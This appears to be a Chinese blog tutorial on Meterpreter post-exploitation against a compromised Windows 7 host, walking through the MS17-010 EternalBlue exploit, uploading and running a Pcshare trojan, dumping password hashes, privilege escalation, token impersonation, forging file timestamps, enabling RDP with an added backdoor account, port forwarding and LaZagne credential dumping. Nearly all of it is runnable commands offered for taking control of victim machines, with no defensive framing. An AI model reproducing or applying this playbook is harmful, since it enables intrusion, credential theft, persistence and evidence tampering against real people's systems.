一.准备及介绍
1、本文介绍对win7肉鸡(未开防火墙)进行上下载文件等控制。
2、环境:win7、MSF、Pcshare
二. meterpreter后期攻击使用方法
1、使用Pcshare制作好木马(1.exe)后;SSH连接kali,打开MSF使用MS17-010(永恒之蓝)后:rz(把制作好的木马文件传到kali)
然后exploit;用(upload <file> <destination>):1)upload (-f) 1.exe c://inetpub(inetpub文件夹必须存在,否则会上传失败)。
2)download <file> <path to save> :download c://17010.txt //root//csa 。
![](https://img.haomeiwen.com/i11964168/5343681753664a25.png)
![](https://img.haomeiwen.com/i11964168/1b32a8d33b2aaf4c.png)
2、execute -f c://inetpub//1.exe(若文件有空格,路径需要加双引号)
![](https://img.haomeiwen.com/i11964168/698e46497687b3a3.png)
![](https://img.haomeiwen.com/i11964168/1c37c4a84fe74d6f.png)
3、ps(查看进程)、hashdump(转储所有账号的hash密码)、getsystem(命令可以提权到本地系统权限)
4、1)portfwd命令是转发技术中最常用的一个命令,可以让攻击系统访问本来无法直接访问的目标主机。
2)add选项会将端口转发添加到列表中,而且本质上会创建一个隧道。
3)portfwd add -l 6666 -p 3389 -r 127.0.0.1 #将目标机的3389端口转发到本地6666端口
![](https://img.haomeiwen.com/i11964168/58e6cf4bb3a7a044.png)
![](https://img.haomeiwen.com/i11964168/faea13b4494de317.png)
4)删除端口转发:portfwd delete -l <portnumber> -p <portnumber> -r <Target IP>
![](https://img.haomeiwen.com/i11964168/bc25d8733a6a1335.png)
5、在目标主机上搜索文件:(search -f *.txt)、获取用户ID(getuid)、获取系统信息(sysinfo)
6、1)模拟任意用户(token操作):use incognito
2)list_tokens -u来显示所有有效的tokens
3)impersonate_token "NT AUTHORITY\NETWORK SERVICE"
7、timestomp伪造时间戳。
timestomp C:// -h #查看帮助
timestomp -v C://2.txt #查看时间戳
timestomp C://2.txt -f C://1.txt #将1.txt的时间戳复制给2.txt
![](https://img.haomeiwen.com/i11964168/1a8c2110e71a2566.png)
8、enable_rdp脚本开启3389:run post/windows/manage/enable_rdp #开启远程桌面
run post/windows/manage/enable_rdp USERNAME=www2 PASSWORD=123456 #添加用户
run post/windows/manage/enable_rdp FORWARD=true LPORT=6662 #将3389端口转发到6662
脚本位于/usr/share/metasploit-framework/modules/post/windows/manage/enable_rdp.rb
通过enable_rdp.rb脚本可知:开启rdp是通过reg修改注册表;添加用户是调用cmd.exe 通过net
user添加;端口转发是利用的portfwd命令
![](https://img.haomeiwen.com/i11964168/086eac839eceae22.png)
9、使用laZagne查看账号密码:laZagne all >>23.txt 。
网友评论